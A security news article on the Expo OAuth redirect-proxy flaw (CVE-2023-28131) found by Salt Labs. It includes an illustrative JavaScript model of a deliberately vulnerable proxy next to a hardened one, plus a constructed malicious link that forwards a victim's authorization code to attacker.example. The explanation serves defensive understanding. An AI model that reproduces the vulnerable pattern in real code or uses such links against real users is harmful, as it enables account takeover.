A critical API flaw in the Expo open-source framework allowed attackers to harvest authentication credentials through the Open Authorization (OAuth) protocol. The vulnerability affected a relatively small number of developers but had the potential to affect a wide range of end users logging in to online services such as Facebook, Twitter or Spotify via apps built on the framework, according to the researchers at Salt Labs who found the bug.
A successful attack could have allowed an adversary to take over accounts and steal credentials on any mobile app or website configured to use the Expo AuthSession Redirect Proxy. Attacks could have been triggered simply by a victim clicking on a malicious link.
Expo is used by developers to build native apps for iOS, Android and the web with a single set of tools, libraries and services, and is considered an effective way to accelerate application development. Its hosted redirect proxy runs at auth.expo.io, which is where the flaw lived.
"The vulnerability may impact hundreds of companies using Expo, including Codecademy," according to Salt Labs. The researchers stress that "the surface area of auth.expo.io is small," which limits the number of affected social sign-on integrations.
Codecademy is a popular online platform with 100 million users and offers free coding classes. "The Salt Labs team was able to exploit the Expo vulnerability on the Codecademy site to gain complete control of accounts," wrote researchers in a May 24 blog post.
OAuth, the industry-standard authorization protocol, is used by sites and apps to offer a "one click" login through existing social media accounts instead of the more traditional user registration and username/password authentication.
Researchers discovered that by manipulating steps in the OAuth sequence on the Expo proxy, they could hijack sessions and take over accounts, steal user financial and health data, and perform actions as the user.
The researchers disclosed their findings to Expo, which quickly fixed the API vulnerability. Expo said the flaw, tracked as CVE-2023-28131 and with a CVSS rating of 9.6, had not been exploited in the wild.
The bug is classified as an API redirect vulnerability. The flaw traces back to the auth.expo.io proxy service and the fact that it stored an app's callback URL "before the user explicitly confirmed they trust the callback URL," according to a technical description. The vulnerability was identified in February, published in the NIST National Vulnerability Database (NVD) in April and updated May 2.
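To make the bug class concrete, the following is an added, simplified model of an OAuth redirect proxy written for this article; it is not Expo's code and does not reproduce the exact auth.expo.io endpoints. A redirect proxy receives the provider's callback and forwards the authorization code to the app's own callback URL (the "returnUrl"). The vulnerable variant remembers whatever returnUrl arrives on the start link before the user confirms anything, so a malicious link can plant an attacker-controlled destination; the hardened variant holds the URL as pending until an explicit confirmation step and also checks it against a registered-callback allowlist. All hostnames, session fields and the authorization code are constructed for the example.

```javascript
// Added illustrative model of a redirect proxy (not Expo's implementation).
// Hypothetical allowlist of callback URLs the registered app is allowed to use.
const REGISTERED_CALLBACKS = new Set([
  "https://app.example.com/oauth/callback", // assumed legitimate app callback
]);

// Per-browser session; a real proxy keys this off a cookie it sets.
function newSession() {
  return { pendingReturnUrl: null, trustedReturnUrl: null };
}

// --- Vulnerable proxy: the returnUrl from the /start link is trusted at once. ---
const vulnerableProxy = {
  start(session, startUrl) {
    const returnUrl = new URL(startUrl).searchParams.get("returnUrl");
    session.trustedReturnUrl = returnUrl; // stored before any user confirmation
    return { redirectTo: "https://provider.example/authorize" };
  },
  callback(session, code) {
    // Forwards the code wherever the session says, attacker-controlled or not.
    const target = new URL(session.trustedReturnUrl);
    target.searchParams.set("code", code);
    return { redirectTo: target.toString() };
  },
};

// --- Hardened proxy: returnUrl stays pending until the user confirms it, and
// must match the allowlist even before a confirmation page is shown. ---
const hardenedProxy = {
  start(session, startUrl) {
    const returnUrl = new URL(startUrl).searchParams.get("returnUrl");
    if (!REGISTERED_CALLBACKS.has(returnUrl)) {
      return { error: "returnUrl not registered for this app" };
    }
    session.pendingReturnUrl = returnUrl; // candidate only, nothing trusted yet
    return { showConfirmPage: returnUrl };
  },
  // Invoked only when the user clicks "Yes, I trust this URL" on the confirm page.
  confirm(session, confirmedUrl) {
    if (session.pendingReturnUrl !== confirmedUrl) {
      return { error: "confirmation does not match pending request" };
    }
    session.trustedReturnUrl = confirmedUrl;
    session.pendingReturnUrl = null;
    return { redirectTo: "https://provider.example/authorize" };
  },
  callback(session, code) {
    if (!session.trustedReturnUrl) {
      return { error: "no confirmed returnUrl for this session" };
    }
    const target = new URL(session.trustedReturnUrl);
    target.searchParams.set("code", code);
    session.trustedReturnUrl = null; // single use
    return { redirectTo: target.toString() };
  },
};

// Constructed malicious link: the proxy's start endpoint with an attacker returnUrl.
const ATTACKER_LINK =
  "https://proxy.example/start?returnUrl=https://attacker.example/collect";

// Victim clicks the link, logs in at the provider, and the provider redirects
// back to the proxy callback with the victim's authorization code.
function runScenario(proxy) {
  const session = newSession();
  const started = proxy.start(session, ATTACKER_LINK);
  if (started.error) return { leaked: false, reason: started.error };
  const result = proxy.callback(session, "AUTHCODE-victim"); // constructed code
  if (result.error) return { leaked: false, reason: result.error };
  const host = new URL(result.redirectTo).hostname;
  return { leaked: host === "attacker.example", redirectTo: result.redirectTo };
}

// A registered returnUrl that the user never confirmed must still be refused.
function runUnconfirmed(proxy) {
  const session = newSession();
  proxy.start(session, "https://proxy.example/start?returnUrl=https://app.example.com/oauth/callback");
  return proxy.callback(session, "AUTHCODE-victim");
}

// Legitimate flow through the hardened proxy, for contrast.
function runLegitimate(proxy) {
  const session = newSession();
  const started = proxy.start(session, "https://proxy.example/start?returnUrl=https://app.example.com/oauth/callback");
  const confirmed = proxy.confirm(session, started.showConfirmPage);
  if (confirmed.error) return confirmed;
  return proxy.callback(session, "AUTHCODE-victim");
}

module.exports = { vulnerableProxy, hardenedProxy, runScenario, runUnconfirmed, runLegitimate };
```

Running `runScenario(vulnerableProxy)` shows the code delivered to attacker.example, while `runScenario(hardenedProxy)` fails at the allowlist and `runUnconfirmed(hardenedProxy)` fails at the callback because nothing was ever confirmed. The two checks are independent on purpose: the allowlist stops unregistered destinations, and the confirmation gate ensures a link the victim merely clicked cannot pre-commit the session to any destination, which is the specific ordering defect the technical description attributes to auth.expo.io.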
Zane Bond, head of product at Keeper Security, said engineers implementing OAuth should question what the different options do, choose the more secure option when possible, and be sure to validate the potential impact when choosing options outside of defaults.
“For security-conscious users, using OAuth to create accounts on third-party apps or websites comes with both security advantages and risks that should be weighed on a case-by-case basis,” said Bond.
Mike Parkin, senior technical engineer at Vulcan Cyber, said the potential risk from the OAuth vulnerability was relatively broad.
“The challenge with any authentication scheme, including OAuth, is implementing it securely … implementing OAuth securely is still a non-trivial task,” said Parkin.